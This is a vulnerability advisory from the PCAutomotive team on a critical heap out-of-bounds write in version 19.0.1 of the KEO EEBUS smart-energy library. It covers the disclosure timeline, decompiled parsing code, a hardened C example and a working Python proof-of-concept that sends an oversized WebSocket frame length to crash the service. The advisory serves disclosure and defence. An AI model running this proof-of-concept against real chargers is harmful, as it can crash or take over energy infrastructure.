
2024-12-09

Critical vulnerability in KEO EEBUS library

PRODUCT DESCRIPTION

The KEO EEBUS library is a robust communication framework designed to facilitate interoperability and seamless data exchange within smart energy management systems. Developed by KEO Connectivity, the library aligns with the EEBUS initiative standards, which promote device compatibility and energy efficiency in smart home and industrial settings.

Figure 1. Application of KEO EEBUS library
(image source: https://www.keo-connectivity.de)

This library enables secure and efficient communication between a wide array of devices, such as smart meters, electric vehicle chargers, home energy management systems, and other IoT-enabled appliances. Leveraging standardized protocols, it allows devices to interact with and respond to energy demand, optimizing consumption and supporting energy grid stability. The KEO EEBUS library is widely integrated into systems focused on energy efficiency, smart grid technology, and sustainable energy management, serving both domestic and commercial applications.

SUMMARY

The PCAutomotive team identified a vulnerability that allowed attackers to execute code on systems using version 19.0.1 of the KEO library.

Table 1 – Summary of vulnerabilities discovered during the research.

Finding ID     Finding Short Description           CVSS Score
PCA_KEO_001    Heap Out-Of-Bound Write in EEBUS    10.0 (Critical)

DISCLOSURE TIMELINE

Date          Description
2024-10-10    Advisory was sent to KEO
2024-10-11    KEO confirmed that the discovered issue was fixed in version 22.1.1.
2024-10-18    PCA requested CVE ID from MITRE, as agreed mutually with KEO
2024-11-14    PCA sent reminder to MITRE about CVE ID
2024-12-09    PCA publishes the advisory

TECHNICAL DETAILS

The PCAutomotive team verified all the findings described in this document on the KEO library, version 19.0.1. This library processes the low-level internals of the EEBUS protocol.

Heap Out-Of-Bound Write in EEBUS

Description

An EEBUS request consists of the following layers:

  1. TLS with self-signed certificates
  2. WebSocket communication in binary mode
  3. SHIP messages in JSON format

The binary mode of WebSocket relies on WebSocket framing, which includes masking, fragmentation and so on. This functionality is implemented in the library libkeo_ship.so.19.0.1.

The function keo_ship::WebSocketParser::parseFrame parses the following structure:

Figure 2 – Websocket frame structure

If the second byte of the frame ("payload len") is 0x7f, the payload length is a 64-bit value. It is parsed in the function sub_24108 and saved to the variable dPayloadLen.

Listing 1 - code for parsing Websocket frame

if ( (unsigned int)(sData.pEnd - sData.pStart) <= 1 )
  return 1;
v7 = *(_BYTE *)sData.pStart;                        // first byte: FIN, RSV bits, opcode
v8 = *((char *)sData.pStart + 1);                   // second byte as signed char: MASK bit is the sign bit
v9 = *((_BYTE *)sData.pStart + 1) & 0x7F;           // 7-bit payload length
if ( v9 > 0x7D )
{
  if ( v9 == 0x7E )
  {
    if ( dDataLen <= 4 )
      return 1;
    v10 = 4;
    v9 = (unsigned __int16)__rev16(*((unsigned __int16 *)sData.pStart + 1));   // 16-bit extended length
  }
  else
  {
    if ( dDataLen <= 0xA )
      return 1;
    v10 = 10;
    dPayloadLen = sub_24108(i_pInData, 2);          // 64-bit extended length, taken from the frame
  }
}

This value is then checked:

Listing 2 - code for parsing Websocket frame (continue)

pEnd = i_pInData->pEnd;
pStart = (char *)i_pInData->pStart;
if ( dPayloadLen + dCurOffset <= pEnd - (_BYTE *)i_pInData->pStart )   // the addition can wrap around
{
  switch ( v7 & 0xF )

Because of an integer overflow, this check can be bypassed: a very large dPayloadLen wraps around when dCurOffset is added to it, so the sum compares as a small value. The length is then used in a write operation on heap memory:

Listing 3 - code for parsing Websocket frame (continue)

v20 = &pStart[v18 - v17];
if ( v20 != v18 )
  i_pInData->pEnd = v20;
if ( v8 < 0 && dPayloadLen )                  // MASK bit set and non-zero length
{
  for ( i = 0; i != dPayloadLen; ++i )        // iterates dPayloadLen times, beyond the buffer
    *((_BYTE *)i_pInData->pStart + i) ^= v12[i & 3];
}
*a3 = dPayloadLen;

Because dPayloadLen is attacker-controlled and can exceed the allocation size, the unmasking loop writes out of bounds of the heap buffer.
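The length check from Listing 2 and a hardened form of it, as an added example written for this advisory rather than code from the KEO library; the frame layout follows the listings, while the function and variable names are hypothetical:

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical model of the frame-length handling discussed above, not the KEO
 * library's code. Parses the 7-, 16- or 64-bit payload length and returns the
 * header size (length fields plus masking key), or 0 if the buffer is too short. */
static size_t parse_header(const uint8_t *p, size_t n, uint64_t *len, int *masked)
{
    if (n < 2) return 0;
    *masked = (p[1] & 0x80) != 0;
    uint64_t l = p[1] & 0x7F;
    size_t hdr = 2;
    if (l == 0x7E) {                       /* 16-bit extended length */
        if (n < 4) return 0;
        l = ((uint64_t)p[2] << 8) | p[3];
        hdr = 4;
    } else if (l == 0x7F) {                /* 64-bit extended length */
        if (n < 10) return 0;
        l = 0;
        for (int i = 0; i < 8; i++) l = (l << 8) | p[2 + i];
        hdr = 10;
    }
    if (*masked) hdr += 4;                 /* 4-byte masking key follows */
    if (hdr > n) return 0;
    *len = l;
    return hdr;
}

/* Check shaped like Listing 2: len + hdr wraps around for a length such as
 * 0xFFFFFFFFFFFFFFFF, so the frame "fits" and a later unmask loop runs off the heap. */
int frame_fits_vulnerable(const uint8_t *p, size_t n)
{
    uint64_t len; int masked;
    size_t hdr = parse_header(p, n, &len, &masked);
    return hdr != 0 && len + hdr <= n;
}

/* Hardened form: compare the length against the bytes actually remaining instead
 * of adding, and unmask in place only after that check. Returns the payload
 * length, or -1 when the frame does not fit the buffer. */
int64_t unmask_frame_hardened(uint8_t *p, size_t n)
{
    uint64_t len; int masked;
    size_t hdr = parse_header(p, n, &len, &masked);
    if (hdr == 0 || len > (uint64_t)(n - hdr)) return -1;
    if (masked)
        for (uint64_t i = 0; i < len; i++) p[hdr + i] ^= p[hdr - 4 + (i & 3)];
    return (int64_t)len;
}
```

With the frame header used in Listing 4 (0xfa 0xff followed by eight 0xff bytes), the vulnerable check accepts the frame while the hardened routine rejects it.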

Exploitation scenario and impact

To reproduce this vulnerability, the charger must be reachable over the network (Ethernet or wireless). The following script triggers a crash of the service:

Listing 4 - Proof-Of-Concept

import socket
import ssl


def main():
    HOST = "192.168.178.47"
    PORT = 4711
    #HOST = "localhost"
    #PORT = 11111
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    # SHIP uses TLS with self-signed certificates on both sides: present a client
    # certificate and do not verify the server's. An SSLContext is used because
    # ssl.wrap_socket is no longer available in Python 3.12 and later.
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    ctx.load_cert_chain(certfile="cert.pem", keyfile="key.pem")
    client = ctx.wrap_socket(client)
    client.connect((HOST, PORT))
    # WebSocket upgrade handshake requesting the "ship" subprotocol
    client.send(b"GET / HTTP/1.1\r\nsec-websocket-protocol: ship\r\nHost: 192.168.178.47:4711\r\nConnection: Upgrade\r\nUpgrade: websocket\r\nSec-WebSocket-Version: 13\r\nSec-WebSocket-Key: 7hBeCrki4fXpmkTiNV/lgQ==\r\n\r\n")
    print(client.recv(0x1000))
    # Frame header, then MASK bit set with payload len 0x7f, so the next eight
    # bytes are read as the 64-bit length (0xffffffffffffffff); the padding
    # supplies the masking key and some payload bytes.
    client.send(b"\xfa\xff" + b"\xff\xff\xff\xff\xff\xff\xff\xff" + 0x100 * b'A')
    print(client.recv(0x1000))


if __name__ == "__main__":
    main()

The crash can be observed in the debugger:

Figure 3 - Crash in debugger

This vulnerability can be triggered remotely. Successful exploitation could allow an attacker to achieve remote code execution on the system.

SUPPLY CHAIN IMPACT

Based on information from open sources, several smart home providers, e-mobility companies, and charging solution vendors were relying on the affected library. This vulnerability might have impacted the supply chain of these companies. The PCAutomotive team advised prioritizing the patch implementation to effectively address and mitigate associated risks.

Recommendations

Considering the criticality of the vulnerability, immediate action was essential to safeguard the affected supply chain. The following steps were recommended:

  • Notification of vendors using the affected library, encouraging prompt application of the patch.
  • Review of supply chain dependencies by assessing any additional component or service that may be affected by this vulnerability.
  • Monitoring for threat indicators by PSOC: advising the organizations to watch for potential signs of compromise related to the exploitation of the vulnerability.

CREDITS

  • Radu Motspan
  • David Zani